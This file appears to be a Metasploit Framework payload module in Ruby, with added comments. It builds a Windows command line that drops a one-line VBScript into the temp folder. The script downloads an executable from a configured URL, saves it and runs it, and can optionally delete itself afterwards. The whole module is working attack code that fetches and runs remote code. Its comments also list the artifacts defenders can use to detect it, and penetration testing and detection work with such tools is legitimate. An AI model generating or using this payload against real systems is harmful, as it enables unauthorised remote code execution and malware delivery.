

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/windows/download_exec_vbs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Windows command payload (ARCH_CMD, requires wscript). The generated command
# line changes into %tmp%, echoes a one-line VBScript into a .vbs file and
# starts it with wscript. The script fetches the configured URL with
# Microsoft.XMLHTTP, writes the response body to disk through ADODB.Stream and
# runs the saved file via WScript.Shell.
#
# Artifacts visible in the generated command line (useful when writing
# detections): `cd %tmp%`, `echo ... >NAME.vbs`, `start wscript NAME.vbs`, and
# the literal ProgIDs Microsoft.XMLHTTP, ADODB.Stream, WScript.Shell and
# (when DELETE is set) Scripting.FileSystemObject. NAME and the saved file's
# base name are one or two random alphabetic characters.
module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values defined here
  def initialize(info = {})
    module_info = {
      'Name' => 'Windows Executable Download and Execute (via .vbs)',
      'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
      'Author' => 'scriptjunkie',
      'License' => BSD_LICENSE,
      'Platform' => 'win',
      'Arch' => ARCH_CMD,
      # Msf::Handler::None: the module declares no handler of its own.
      'Handler' => Msf::Handler::None,
      'Session' => Msf::Sessions::CommandShell,
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'wscript',
      'Payload' => {
        'Offsets' => {},
        'Payload' => ''
      }
    }
    super(merge_info(info, module_info))

    options = [
      OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
      OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
      OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
      OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
    ]
    register_options(options)
  end

  # Builds the payload: whatever the parent class generates, followed by the
  # command line from #command_string.
  #
  # @param _opts [Hash] unused here; forwarded implicitly to super
  # @return [String]
  def generate(_opts = {})
    super + command_string
  end

  # Assembles the single command line that drops and launches the VBScript.
  #
  # URL and EXT are interpolated verbatim: this method applies no quoting or
  # escaping, which is presumably why the URL option asks for a pre-encoded
  # value.
  #
  # @return [String] the command line
  def command_string
    # Names are only 1-2 characters because the command line is already long.
    # The four random draws stay in this order: script file, saved file, then
    # the two VBScript variables.
    script_base = Rex::Text.rand_text_alpha(1 + rand(2))
    saved_base = Rex::Text.rand_text_alpha(1 + rand(2))
    http = Rex::Text.rand_text_alpha(1 + rand(2))
    stream = Rex::Text.rand_text_alpha(1 + rand(2))

    script_file = "#{script_base}.vbs"
    saved_file = "#{saved_base}.#{datastore['EXT']}"

    # VBScript statements; each one is terminated with ':' so the whole script
    # fits on the single line that `echo` writes out.
    statements = [
      "Set #{http}=CreateObject(\"Microsoft.XMLHTTP\")",
      # Third argument False makes the request synchronous.
      "#{http}.Open \"GET\",\"#{datastore['URL']}\",False",
      "#{http}.Send",
      "Set #{stream}=CreateObject(\"ADODB.Stream\")",
      # Type=1 selects binary mode for the stream.
      "#{stream}.Type=1",
      "#{stream}.Open",
      "#{stream}.Write #{http}.responseBody",
      # Save option 2 overwrites an existing file of the same name.
      "#{stream}.SaveToFile \"#{saved_file}\",2",
      "CreateObject(\"WScript.Shell\").Run \"#{saved_file}\""
    ]

    command = ''
    command << 'cmd.exe /q /c ' if datastore['INCLUDECMD']
    command << 'cd %tmp%&echo '
    statements.each { |statement| command << statement << ':' }
    if datastore['DELETE']
      # Optional final statement: the script removes its own .vbs file.
      command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{script_file}\""
    end
    # `start` is used rather than invoking the script directly so the console
    # window goes away quickly, before wscript has loaded its libraries and
    # the download has run.
    command << " >#{script_file}&start wscript #{script_file}"
  end
end